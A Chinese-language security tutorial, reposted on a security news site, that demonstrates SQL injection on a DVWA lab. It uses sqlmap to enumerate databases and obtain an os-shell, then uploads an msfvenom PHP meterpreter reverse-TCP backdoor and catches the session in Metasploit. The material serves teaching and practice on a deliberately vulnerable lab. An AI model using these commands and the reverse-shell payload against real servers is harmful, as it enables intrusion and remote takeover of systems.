使用 Sqlmap 在 Web 服务器中上传 Shell

admin 2024年12月16日23:02:48评论11 views字数 1934阅读6分26秒阅读模式
大家好!您可能多次使用 sqlmap 进行 SQL 注入以获取 Web 服务器的数据库信息。在本教程中,我将向您展示如果网站存在 SQL 漏洞,如何上传任何后门来获取 meterpreter 会话。

DVWA 实验室设置

  • 要求:
  • Xampp/Wamp 服务器
  • DVWA Web 易受攻击的应用程序
  • Kali Linux:Burp套件、sqlmap工具

 首先,你需要在 XAMPP 或 WAMP 服务器中安装 DVWA 实验室

导航至易受 SQL 注入攻击的页面

现在让我们通过 Web 浏览器导航到 DVWA 并使用以下凭据登录:

用户名 – admin

密码 – 密码

单击 DVWA Security并将网站安全级别 设置 为低

从漏洞列表中选择 SQL 注入作为攻击。在文本框中输入 用户 ID:1  。在未设置 Web 浏览器代理的情况下,请勿单击提交按钮。设置浏览器代理以使 burp suite 正常工作。

使用 Sqlmap 在 Web 服务器中上传 Shell

拦截浏览器请求

现在让我们按照以下步骤拦截浏览器请求:

  • 在网络浏览器中设置网络代理后,打开 burp suite。
  • 单击菜单栏中的代理,然后按按钮进行拦截。
  • 返回并单击 dvwa 中的提交按钮。
  • 复制拦截的数据并保存在文本文件中。

Intercept 按钮用于显示浏览器和 Web 服务器之间传递的 HTTP 和 Web Sockets 消息。Burp suit 将在获取的数据下提供“cookie”和“referrer”,可直接在 sqlmap 命令中使用。

使用 Sqlmap 在 Web 服务器中上传 Shell

提取数据库名称

现在使用sqlmap进行SQL注入并运行以下命令来枚举数据库名称。

sqlmap -r file --dbs--batch
这里 - 
r 选项
用于分析来自“文件”的 HTTP 请求,正如您所观察到的,它必须将
DVWA
转储为数据库名称。
使用 Sqlmap 在 Web 服务器中上传 Shell

生成 os-shell

现在输入以下命令来运行 sqlmap 来访问 web 服务器 (dvwa) 的 os-shell

sqlmap -r file -D dvwa --os-shell
它将尝试生成一个后门;如果您想在 Web 服务器内上传 PHP 后门,则 
输入 4
 作为 
PHP
 有效负载。
使用 Sqlmap 在 Web 服务器中上传 Shell

输入 4 进行暴力搜索,将其用作可写目录来上传。

它试图使用 SQL 注入技术将文件上传到“/xampp/htdocs/”。一旦文件上传,它将发送信息“文件暂存器已成功上传到 /xampp/htdocs/ ”,您将获得受害者电脑的 os-shell。除此之外,它还显示了文件暂存器的路径,您可以在其中手动上传后门,请查看上面突出显示的 URL:

http://192.168.1.105:80/tmpurufu.php
使用 Sqlmap 在 Web 服务器中上传 Shell

在浏览器中探索文件暂存器

在浏览器中浏览 URL :http://192.168.1.105/tmpurufu.php  。从下面的屏幕截图中,您可以看到网页的标题“ sqlmap file uploader ”,它可以让您在 Web 服务器 (dvwa) 上浏览您的后门,稍后我们可以将该后门上传到 Web 服务器的 /xampp/htdocs/ 目录中。

使用 Sqlmap 在 Web 服务器中上传 Shell

生成PHP后门

让我们用 msfvenom 准备可以上传的恶意 php 文件:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw
将代码从 <?php 复制到 die() 并将其保存在扩展名为 .php 的文件中。我已将后门保存为桌面上的
shell.php
 ,稍后将浏览此文件以将其上传到 Web 服务器上。另一方面,通过键入msfconsole
加载 Metasploit 框架  并启动 
multi/handle。
使用 Sqlmap 在 Web 服务器中上传 Shell

上传并执行 Msfvenom PHP 后门

单击 浏览选项卡以选择您的后门文件(shell.php) 文件,然后单击 上传。

使用 Sqlmap 在 Web 服务器中上传 Shell
太棒了!这里显示管理文件已上传,这意味着后门 shell.php 已上传。
使用 Sqlmap 在 Web 服务器中上传 Shell
要在目标机器上执行后门文件,请在浏览器中运行URL: 
192.168.1.105/shell.php ,您将通过multi/handler收到反向连接。
使用 Sqlmap 在 Web 服务器中上传 Shell
获取Meterpreter Shell
msf> use multi/handlermsf exploit(handler) > set lport 4444msf exploit(handler) > set lhost 192.168.1.109msf exploit(handler) > set payload php/meterpreter/reverse_tcpmsf exploit(handler) > exploit
太棒了! 
 这里我们得到了我们的 meterpreter 会话 1。
使用 Sqlmap 在 Web 服务器中上传 Shell
欢迎关注“三沐数安”,请分享给更多的网安爱好者,大家一起研究网络安全技术。三沐专注于数据安全建设和网络安全建设,解决您身边的网络安全问题,成为您的安全好帮手

原文始发于微信公众号(三沐数安):使用 Sqlmap 在 Web 服务器中上传 Shell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月16日23:02:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用 Sqlmap 在 Web 服务器中上传 Shellhttps://cn-sec.com/archives/3503508.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息